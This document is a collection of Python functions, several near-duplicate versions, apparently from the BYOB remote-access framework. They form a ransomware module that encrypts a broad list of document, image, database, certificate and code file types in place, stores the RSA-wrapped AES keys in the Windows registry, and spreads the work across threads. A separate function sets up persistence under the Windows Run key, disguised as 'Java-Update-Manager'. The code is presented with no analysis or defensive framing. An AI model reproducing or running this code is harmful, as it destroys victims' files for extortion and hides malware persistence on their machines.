def encrypt_file(path): """ Encrypt a file """ try: if not os.path.isfile(path) or not os.path.splitext(path)[1] in [ '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg', '.jpeg', '.png', '.img', '.gif', '.mp3', '.mp4', '.mpeg', '.mov', '.avi', '.wmv', '.rtf', '.txt', '.html', '.php', '.js', '.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpg', '.jpe', '.jpg', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2', '.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw', '.rwl', '.rw2', '.r3d', '.ptx', '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b', '.p7c', '.tmp', '.py', '.php', '.html', '.css', '.js', '.rb', '.xml' ]: return aes_key = Crypto.Hash.MD5.new(Crypto.get_random_bytes(16)).hexdigest() with open(path, 'rb') as fp: plaintext = fp.read() ciphertext = crypto.encrypt_aes(plaintext, key) with open(path, 'wb') as fd: fd.write(ciphertext) cipher = Crypto.Cipher.PKCS1_OAEP.new(publickey) key = base64.b64encode(cipher.encrypt(aes_key)) util.registry_key(r'SOFTWARE\BYOB', path, key) util.debug('{} encrypted'.format(path)) except Exception as e: util.debug("{} error: {}".format(encrypt.func_name, str(e)))
def encrypt_file(filename, rsa_key): """ Encrypt a file with AES-256-OCB symmetric encryption using a randomly generated key, encrypt the key with RSA-2048 asymmetric encryption, then store the filename and RSA-encrypted AES-key as a key in the Windows Registry `Requires` :param str filename: target filename :param RsaKey rsa_key: 2048-bit public RSA key Returns True if succesful, otherwise False """ try: if os.path.isfile(filename): if os.path.splitext(filename)[1] in globals()['filetypes']: if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key) aes_key = os.urandom(32) with open(filename, 'rb') as fp: data = fp.read() ciphertext = encrypt_aes(data, aes_key) with open(filename, 'wb') as fd: fd.write(ciphertext) key = base64.b64encode(cipher.encrypt(aes_key)) util.registry_key(globals()['registry_key'], filename, key) util.log('{} encrypted'.format(filename)) return True else: util.log("File '{}' not found".format(filename)) except Exception as e: util.log("{} error: {}".format(encrypt_file.func_name, str(e))) return False
def encrypt_file(filename, rsa_key): """ Encrypt a file with AES-256-OCB symmetric encryption using a randomly generated key, encrypt the key with RSA-2048 asymmetric encryption, then store the filename and RSA-encrypted AES-key as a key in the Windows Registry `Requires` :param str filename: target filename :param RsaKey rsa_key: 2048-bit public RSA key Returns True if succesful, otherwise False """ try: if os.path.isfile(filename): if os.path.splitext(filename)[1] in globals()['filetypes']: if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key) aes_key = os.urandom(32) with open(filename, 'rb') as fp: data = fp.read() ciphertext = encrypt_aes(data, aes_key) with open(filename, 'wb') as fd: fd.write(ciphertext) key = base64.b64encode(cipher.encrypt(aes_key)) util.registry_key(globals()['registry_key'], filename, key) util.log('{} encrypted'.format(filename)) return True else: util.log("File '{}' not found".format(filename)) except Exception as e: util.log("{} error: {}".format(encrypt_file.__name__, str(e))) return False
def encrypt_file(filename, rsa_key): """ Encrypt a file with AES-256-OCB symmetric encryption using a randomly generated key, encrypt the key with RSA-2048 asymmetric encryption, then store the filename and RSA-encrypted AES-key as a key in the Windows Registry `Requires` :param str filename: target filename :param RsaKey rsa_key: 2048-bit public RSA key Returns True if succesful, otherwise False """ try: if os.path.isfile(filename): if os.path.splitext(filename)[1] in [ '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg', '.jpeg', '.png', '.img', '.gif', '.mp3', '.mp4', '.mpeg', '.mov', '.avi', '.wmv', '.rtf', '.txt', '.html', '.php', '.js', '.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpg', '.jpe', '.jpg', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2', '.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw', '.rwl', '.rw2', '.r3d', '.ptx', '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b', '.p7c', '.tmp', '.py', '.php', '.html', '.css', '.js', '.rb', '.xml', '.py', '.pyc', '.wmi', '.sh', '.spec', '.asp', '.aspx', '.plist', '.json', '.sql', '.vbs', '.ps1' ]: if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key) aes_key = Crypto.Random.get_random_bytes(32) with open(filename, 'rb') as fp: data = fp.read() ciphertext = security.encrypt_aes(data, aes_key) with open(filename, 'wb') as fd: fd.write(ciphertext) key = base64.b64encode(cipher.encrypt(aes_key)) util.registry_key(globals()['_registry_key'], filename, key) util.debug('{} encrypted'.format(filename)) return True else: _debugger.debug("File '{}' not found".format(filename)) except Exception as e: _debugger.debug("{} error: {}".format(encrypt_file.func_name, str(e))) return False
def _add_registry_key(value=None, name='Java-Update-Manager'): try: if os.name == 'nt' and not _methods['registry_key'].established: value = sys.argv[0] if value and os.path.isfile(value): try: util.registry_key(r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", name, value) return (True, name) except Exception as e: util.log('{} error: {}'.format(_add_registry_key.__name__, str(e))) except Exception as e: util.log('{} error: {}'.format(_add_registry_key.__name__, str(e))) return (False, None)
def _add_registry_key(value=None, name='Java-Update-Manager'): try: if os.name == 'nt' and not _methods['registry_key'].established: value = sys.argv[0] if value and os.path.isfile(value): try: util.registry_key(r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", name, value) return (True, name) except Exception as e: util.log('{} error: {}'.format(_add_registry_key.func_name, str(e))) except Exception as e: util.log('{} error: {}'.format(_add_registry_key.func_name, str(e))) return (False, None)
def encrypt_files(args): try: if os.path.splitext(path)[1] in [ '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg', '.jpeg', '.png', '.img', '.gif', '.mp3', '.mp4', '.mpeg', '.mov', '.avi', '.wmv', '.rtf', '.txt', '.html', '.php', '.js', '.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpg', '.jpe', '.jpg', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2', '.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw', '.rwl', '.rw2', '.r3d', '.ptx', '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b', '.p7c', '.tmp', '.py', '.php', '.html', '.css', '.js', '.rb', '.xml' ]: aes_key = Crypto.Hash.MD5.new( Crypto.Ransom.get_random_bytes(16)).hexdigest() ransom = encrypt_file(path, key=aes_key) cipher = Crypto.Cipher.PKCS1_OAEP.new(ransom.pubkey) key = base64.b64encode(cipher.encrypt(aes_key)) util.registry_key(ransom, path, key) util.debug('{} encrypted'.format(path)) if not len([ k for k in workers if 'encrypt-files' in k if workers[k].is_alive() ]): rnd = random.randint(1, 100) workers['encrypt-files-{}'.format(rnd)] = threading.Thread( target=threader, args=(jobs, ), name=time.time()) workers['encrypt-files-{}'.format(rnd)].daemon = True workers['encrypt-files-{}'.format(rnd)].start() except Exception as e: util.debug("{} error: {}".format(_encrypt.func_name, str(e)))